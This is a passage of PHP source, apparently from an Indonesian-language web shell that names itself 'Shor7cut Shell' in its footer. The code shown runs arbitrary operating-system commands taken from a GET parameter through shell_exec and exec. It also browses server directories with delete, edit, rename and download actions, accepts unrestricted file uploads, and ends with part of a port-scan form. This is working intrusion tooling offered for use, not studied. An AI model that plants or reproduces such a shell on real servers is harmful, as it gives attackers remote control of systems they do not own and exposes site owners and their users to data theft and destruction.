	foreach (array_keys($port_list) as $value_port) {
		echo "<option value=$port_list[$value_port]>".$value_port."</option>";
	}
	?>
</select>
<input name="shcportscan" type="submit" value="scan port">
</form>
<?php
}

?>

</div>
<?php
}else if($_GET['shc_command']){?>
<div id="result"><pre>
<?php
if((strtolower(substr($s_system,0,3)) == "win")){
	if(shell_exec($_GET['shc_command'])){
	echo shell_exec($_GET['shc_command']);
	}else{
	echo "command tidak ditemukan";
	}
}else{
	if(exec($_GET['shc_command'])){
	echo exec($_GET['shc_command']);
	}else{
	echo "command tidak ditemukan";	
	}
}
?>
</pre>
</div>
<?php
}else {
		?>
<div id="result">
	<table class="explore sortable"><thead>
	<tr><th style="width:24px;" class="sorttable_nosort"></th>
	<th>name</th>
	<th style="width:100px;">Size</th>
	<th style="width:120px;">Last Modified</th>
	<th style="width:20px;">Permissions</th>
	<th style="width:135px;">action</th>
	</tr>
	</thead>
	<tbody>
<?php
$s_scandir = scandir($s_patch_i);
foreach ($s_scandir as $key => $value_dir) {
$s_fpatch = "$s_patch_i/$value_dir";
if(!is_dir($s_fpatch) || !$value_dir == "." || !$value_dir == ".."){
$url_href = "?view=";
}else{
$url_href = "?cd=";
}
	echo '<tr>		
	<td style="width:24px;">~</td>
	<td><a href="'.$url_href.$s_fpatch.'">'.$value_dir.'</a></td>
	<td>'.filesize_formatted($value_dir).'</td>
	<td><small>'.date ("d F Y H:i:s", filemtime($value_dir)).'</small></td>
	<td style="width:10px;">'.perms($s_fpatch).'</td>
	<td>'?>
<?php
if(!is_dir($s_fpatch) || !$value_dir == "." || !$value_dir == ".."){?>
<form action="" method="post">
<select name="opsi">
	<option value="delete">Hapus</option>
	<option value="edit">Edit</option>
	<option value="rename">Rename</option>
	<option value="download">Download</option>
</select>
<input type="hidden" name="s_patch_lct" value="<?php echo $s_fpatch;?>">
<input type="hidden" name="s_name_file" value="<?php echo $value_dir;?>">
<input type="hidden" name="s_loca_file" value="<?php echo $s_patch_i;?>">
<input type="submit" name="aksishor7cut" value=">>">
</form>
<?php
}else{
?>
	<form action="" method="post">
<select name="opsi">
	<option value="rename">Rename</option>
	<option value="delete">Hapus</option>
</select>
<input type="hidden" name="s_patch_lct" value="<?php echo $s_fpatch;?>">
<input type="hidden" name="s_name_file" value="<?php echo $value_dir;?>">
<input type="hidden" name="s_loca_file" value="<?php echo $s_patch_i;?>">
<input type="submit" name="aksishor7cut" value=">>">
</form>

<?php
}
	echo '
	</td>
	</tr>';

}
} //akhir get
?>
		
		</tbody>
			</table>
			</div>
<?php 
echo '<div id="result">';
echo '
<div class="fileUpload btn btn-primary">
<form method=POST enctype="multipart/form-data" action="">
<input type="file" name="files" class="upload"> <input type=submit value="Upload"></form>';
$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = "$s_patch_i/".$files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo '   <font color="green">Berhasil Cuk!!!</font>';
        $s_url_Req = "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
        header('Location: '.$s_url_Req.'');
    }else{
    	echo '   <font color="red">Gagal Cuk!!!</font>';
    }
}

echo '</div></div>';
?>

			<hr>
<footer>
	<?php echo date(Y).' &copy; Shor7cut Shell '.$s_ver;?>
</footer>
</body>
</html>

<pre>
<?php
}
?>
